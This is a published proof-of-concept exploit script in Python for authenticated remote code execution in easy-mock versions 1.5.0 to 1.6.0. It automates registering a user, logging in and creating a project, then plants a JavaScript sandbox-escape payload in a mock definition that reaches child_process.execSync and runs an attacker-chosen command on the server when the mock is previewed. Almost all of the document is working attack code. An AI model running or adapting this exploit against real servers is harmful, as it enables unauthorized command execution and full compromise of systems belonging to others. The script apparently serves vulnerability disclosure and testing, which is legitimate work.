easy-mock 1.6.0 - Remote Code Execution (RCE) (Authenticated)

# Exploit Title: easy-mock 1.6.0 - Remote Code Execution (RCE) (Authenticated)
# Date: 12/08/2021
# Exploit Author: LionTree
# Vendor Homepage: https://github.com/easy-mock
# Software Link: https://github.com/easy-mock/easy-mock
# Version: 1.5.0-1.6.0
# Tested on: windows 10(node v8.17.0)

import requests
import json
import random
import string

target = 'http://127.0.0.1:7300'
username = ''.join(random.sample(string.ascii_letters + string.digits, 8))
password = ''.join(random.sample(string.ascii_letters + string.digits, 8))
print(username)
print(password)
# can't see the result of command
cmd = 'calc.exe'

# register
url = target + "/api/u/register"
cookies = {"SSO_LANG_V2": "EN"}
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", "Authorization": "Bearer undefined", "Origin": "http://127.0.0.1:7300", "Connection": "close", "Referer": "http://127.0.0.1:7300/login", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "Cache-Control": "max-age=0"}
json_data={"name": username, "password": password}
requests.post(url, headers=headers, cookies=cookies, json=json_data)

# login
url = target + "/api/u/login"
cookies = {"SSO_LANG_V2": "EN"}
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", "Authorization": "Bearer undefined", "Origin": "http://127.0.0.1:7300", "Connection": "close", "Referer": "http://127.0.0.1:7300/login", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "Cache-Control": "max-age=0"}
json_data={"name": username, "password": password}
req = requests.post(url, headers=headers, cookies=cookies, json=json_data).text
login = json.loads(req)
token = login['data']['token']

# create project
url = target + "/api/project/create"
cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token}
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", "Authorization": "Bearer " + token, "Origin": "http://127.0.0.1:7300", "Connection": "close", "Referer": "http://127.0.0.1:7300/new", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"}
json_data={"description": "just a poc", "group": "", "id": "", "members": [], "name": username, "swagger_url": "", "url": "/" + username}
requests.post(url, headers=headers, cookies=cookies, json=json_data)

# get project_id
url = target + "/api/project?page_size=30&page_index=1&keywords=&type=&group=&filter_by_author=0"
cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token}
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Authorization": "Bearer " + token, "Connection": "close", "Referer": "http://127.0.0.1:7300/login", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"}
req = requests.get(url, headers=headers, cookies=cookies).text
projects = json.loads(req)
project_id = projects['data'][0]['_id']

# create mock
url = target + "/api/mock/create"
cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token}
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", "Authorization": "Bearer " + token, "Origin": "http://127.0.0.1:7300", "Connection": "close", "Referer": "http://127.0.0.1:7300/editor/" + project_id, "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"}
json_data={"description": "poc", "method": "get", "mode": "{\n  'foo': 'Syntax Demo',\n  'name': function() {\n    return (function() {\n      TypeError.prototype.get_process = f => f.constructor(\"return process\")();\n      try {\n        Object.preventExtensions(Buffer.from(\"\")).a = 1;\n      } catch (e) {\n        return e.get_process(() => {}).mainModule.require(\"child_process\").execSync(\"" + cmd + "\").toString();\n      }\n    })();\n  }\n}", "project_id": project_id, "url": "/" + username}
requests.post(url, headers=headers, cookies=cookies, json=json_data)

# preview mock
url = target + "/mock/{}/{}/{}".format(project_id,username,username)
cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token}
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Referer": "http://127.0.0.1:7300/mock/{}/{}/{}".format(project_id,username,username), "Content-Type": "application/json", "Connection": "close", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "Cache-Control": "max-age=0"}
requests.get(url, headers=headers, cookies=cookies)